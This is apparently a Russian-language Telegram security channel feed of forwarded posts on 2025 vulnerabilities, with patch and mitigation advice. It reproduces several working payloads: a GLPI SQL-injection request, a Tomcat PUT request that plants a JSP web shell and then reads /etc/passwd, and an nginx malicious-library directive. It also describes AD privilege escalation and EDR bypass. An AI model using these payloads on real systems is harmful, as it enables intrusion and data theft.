Как это выглядит / Как это ощущается
Мне определенно нужна парочка выходных после этой пролабы
🔥4😁2🤯1
Forwarded from SecuriXy.kz
➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer).
📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.
🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!
💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.
📖 Блог-пост с подробностями:
👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
💣 PoC:
👉 https://github.com/0x6rss/CVE-2025-24071_PoC
📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.
🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!
💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.
📖 Блог-пост с подробностями:
👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
💣 PoC:
👉 https://github.com/0x6rss/CVE-2025-24071_PoC
0x6rss
CVE-2025-24071: NTLM Hash Leak
Technical explanation of NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2025-23120: Domain-Level RCE in Veeam Backup & Replication
https://labs.watchtowr.com/by-executive-order-we-are-banning-blacklists-domain-level-rce-in-veeam-backup-replication-cve-2025-23120/
Affected Product:
Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds.
Patched: March 19, 2025
#ad #pentest #redteam #rce
https://labs.watchtowr.com/by-executive-order-we-are-banning-blacklists-domain-level-rce-in-veeam-backup-replication-cve-2025-23120/
Affected Product:
Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds.
Patched: March 19, 2025
#ad #pentest #redteam #rce
Forwarded from Offensive Xwitter
😈 [ Wietze @Wietze ]
By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.
My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.
Here’s what I found and why it matters:
🔗 https://wietze.github.io/blog/bypassing-detections-with-command-line-obfuscation
🐥 [ tweet ]
By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.
My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.
Here’s what I found and why it matters:
🔗 https://wietze.github.io/blog/bypassing-detections-with-command-line-obfuscation
🐥 [ tweet ]
Forwarded from Blue (h/c)at Café
Всем привет, и да, я снова тут с постом, который никто особо не ждал, ведь выше есть пост, но пройти мимо такой темы я не смог. Сегодня расскажу более подробно про свежий и крайне неприятный инцидент в Kubernetes-мире.
Короче, ребята из Wiz недавно нашли серию критических уязвимостей в контроллере Ingress-NGINX для Kubernetes. Назвали это всё красиво и драматично – IngressNightmare. И поверьте, название выбрали неспроста: если коротко, то это пять CVE, из-за которых атакующий может спокойно выполнить код на ingress-контроллере и буквально угнать весь кластер со всеми секретами. И самое весёлое, что атакующему даже не нужны учётные записи или пароли, хватит одного кривого HTTP-запроса.
Суть этих уязвимостей кроется в недостаточной проверке входящих данных, которые разработчики Ingress-NGINX радостно вставляли напрямую в конфиги NGINX. Из-за этого через безобидные, казалось бы, аннотации (auth-url, auth-tls-match-cn, mirror-target) можно было внедрить произвольные директивы. Ну, например, какую-нибудь такую прелесть:
ssl_engine /tmp/malicious.so;
Именно это использовали исследователи Wiz в своём PoC. Ты просто отправляешь HTTP-запрос с большим телом, NGINX сохраняет это тело как временный файл, а потом через специальный AdmissionReview-запрос (без аутентификации!) загружает твою вредоносную .so библиотеку. И всё, поздравляю, теперь ты внутри контейнера с контроллером. Дальше читаешь секреты, токены и вообще делаешь, что хочешь.
Если ваша версия Ingress-NGINX ниже v1.12.1 (а ещё 1.11.5 и 1.10.7), то у вас серьёзные проблемы:
kubectl -n ingress-nginx get deploy ingress-nginx-controller -o=jsonpath='{.spec.template.spec.containers[0].image}'
image: ingress-nginx/controller:v1.12.0
Что делать, если вы попали в этот клуб неудачников с уязвимой версией:
1. Срочно обновляйтесь до v1.12.1;
2. Пока не обновились, отключите admission-контроллер (controller.admissionWebhooks.enabled=false);
3. Ограничьте доступ к admission webhook с помощью Network Policy. Только API-сервер должен туда стучаться;
4. Просмотрите audit-логи Kubernetes и ищите подозрительные Ingress’ы с странными аннотациями.
Если вы не можете обновиться сразу (а кто из нас может?), хотя бы проверьте, что webhook не светит в интернет. В Wiz уже подсчитали, что около 6500 кластеров с открытым admission webhook доступны снаружи.
Вот казалось бы, мелочь – не проверить пару строк кода, не закрыть пару портов, но в итоге получаешь катастрофу, достойную отдельного поста в моём канале. В очередной раз понимаешь, насколько всё хрупко и насколько важна роль команд AppSec и DevSecOps в крупных компаниях. В общем, проверьте свои кластеры, обновитесь и берегите нервы, они вам ещё пригодятся.
Спасибо, что дочитали мой очередной маленький монолог. Обещаю, скоро вернусь с чем-нибудь менее трагичным.
#devsecops #appsec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Волосатый бублик
VMware Tools for Windows update addresses an authentication bypass vulnerability (CVE-2025-22230)
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518
Forwarded from Pentest Notes
This media is not supported in your browser
VIEW IN TELEGRAM
Подготовил для вас самый большой на данный момент гайд по тестированию CMS Bitrix. 😈
➡️ Причем, в статье я не только показал все существующие на данный момент известные методы и техники поиска уязвимостей в битриксе, но и поделился своими уникальными наработками. Включая атаки на кастомные модули и анонс собственного сканера под CMS Bitrix.
➡️ Также добавил материалы по структуре модулей и матчасть по самому Битриксу. Даже если вы только знакомитесь с этой CMS, после прочтения точно что-нибудь найдете)🥤
Ссылка на статью
💫 @pentestnotes | #pentest #bitrix
Ссылка на статью
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Forwarded from 1N73LL1G3NC3
We’re removing the bypassnro.cmd script to enhance security and user experience of Windows 11. This change ensures that all users exit setup with internet connectivity and a Microsoft Account
Microsoft noted in a blog post.
You just need to create a new Registry value by following these steps, to bypass it:
• On the “Let’s connect you to a network” screen, press Shift + F10 to open Command Prompt.
• Type regedit to open the Registry Editor.
• In Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE
• Right-click on the blank space in the right panel and select:
• New > DWORD (32-bit) Value
• Name it exactly: BypassNRO
• Double-click BypassNRO, and set the value data to 1.
• Close Registry Editor.
• Restart.
Or you can just open Command Prompt and run the following script:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE" /v BypassNRO /t REG_DWORD /d 1 /f
If you followed the steps correctly, you will see the “I don’t have internet” option again.Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Информационная опасность
Лист важных Event ID для отслеживания потенциальных угроз и атак на основе журналов Windows. PDF версия.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.
🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18
🔍 PoC:
POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232
<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>
🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main
📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html
‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.
Forwarded from Пентестер на мотоцикле
Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!
▎ Внутри репозитория:
А какие добавленные расширения вам больше всего понравились?
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1👍1
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
📥 Доступ к вебшеллу:
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.
💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99
🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).
📦 PoC:
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i
📥 Доступ к вебшеллу:
curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i
📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg
‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.
⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
🔥1
Forwarded from GigaHackers (Vlad Driev)
This media is not supported in your browser
VIEW IN TELEGRAM
[RemoteMonologue]
Всем привет!👋
Вчера было опубликовано интересное исследование. В нем описан способ удаленного получения NetNTLMv1-хэша пользователя, работающего в интерактивной сессии. Настройки машины при этом могут быть корректными, в ходе атаки происходит их изменение.
Почему обращаем на это внимание? Хэш NetNTLMv1 хорош тем, что его можно без особого труда переслать на LDAP и провести манипуляции с доменом от имени пользователя, чья сессия была на удаленном узле.
💻 Ссылка на PoC
На мой взгляд самый реальный и просто кейс, который из этого вытекает: повышение привилегий в домене AD, когда у атакующего есть сессия локального администратора на узле и рядом с ней сессия администратора домена. Просто удаленно тригерим аутентификацию, делаем NTLM Relay на LDAP, создаем пользователя или повышаем привилегии существующей УЗ, получаем администратора домена.
Прикладываю небольшое демо для демонстрации кейса с повышением привилегий в домене. 👆
Судя по тексту исследования, пока что это фича, которую не запатчили и не планируют.
@GigaHack
#pentest #ad #gigahack
Всем привет!
Вчера было опубликовано интересное исследование. В нем описан способ удаленного получения NetNTLMv1-хэша пользователя, работающего в интерактивной сессии. Настройки машины при этом могут быть корректными, в ходе атаки происходит их изменение.
Почему обращаем на это внимание? Хэш NetNTLMv1 хорош тем, что его можно без особого труда переслать на LDAP и провести манипуляции с доменом от имени пользователя, чья сессия была на удаленном узле.
На мой взгляд самый реальный и просто кейс, который из этого вытекает: повышение привилегий в домене AD, когда у атакующего есть сессия локального администратора на узле и рядом с ней сессия администратора домена. Просто удаленно тригерим аутентификацию, делаем NTLM Relay на LDAP, создаем пользователя или повышаем привилегии существующей УЗ, получаем администратора домена.
Прикладываю небольшое демо для демонстрации кейса с повышением привилегий в домене. 👆
Судя по тексту исследования, пока что это фича, которую не запатчили и не планируют.
@GigaHack
#pentest #ad #gigahack
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Alex Neff @al3x_n3ff ]
NetExec v1.4.0 has been released! 🎉
There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system
And much more!
Full rundown:
🔗 https://github.com/Pennyw0rth/NetExec/releases/tag/v1.4.0
🐥 [ tweet ]
NetExec v1.4.0 has been released! 🎉
There is a HUGE number of new features and improvements, including:
- backup_operator: Automatic priv esc for backup operators
- Certificate authentication
- NFS escape to root file system
And much more!
Full rundown:
🔗 https://github.com/Pennyw0rth/NetExec/releases/tag/v1.4.0
🐥 [ tweet ]
🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
NTLM релей в WinRMS, не ждали? А вот...
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Часто же бывает такое, что необходимо найти машины, на которых работают определенные пользователи. Скрипт показывает сессии на всех хостах, которые дернет из LDAP.
https://github.com/p0dalirius/FindUnusualSessions
#pentest #redteam #ad #enum
https://github.com/p0dalirius/FindUnusualSessions
#pentest #redteam #ad #enum
Forwarded from 1N73LL1G3NC3
CVE-2025-21204: LPE in Windows Update Stack
A local privilege escalation flaw in the Windows Update Stack. By abusing directory junctions or symbolic links, attackers can hijack trusted paths accessed by SYSTEM-level processes like MoUsoCoreWorker.exe and execute arbitrary code with elevated privileges.
Blog: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/
A local privilege escalation flaw in the Windows Update Stack. By abusing directory junctions or symbolic links, attackers can hijack trusted paths accessed by SYSTEM-level processes like MoUsoCoreWorker.exe and execute arbitrary code with elevated privileges.
Blog: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/
🔥2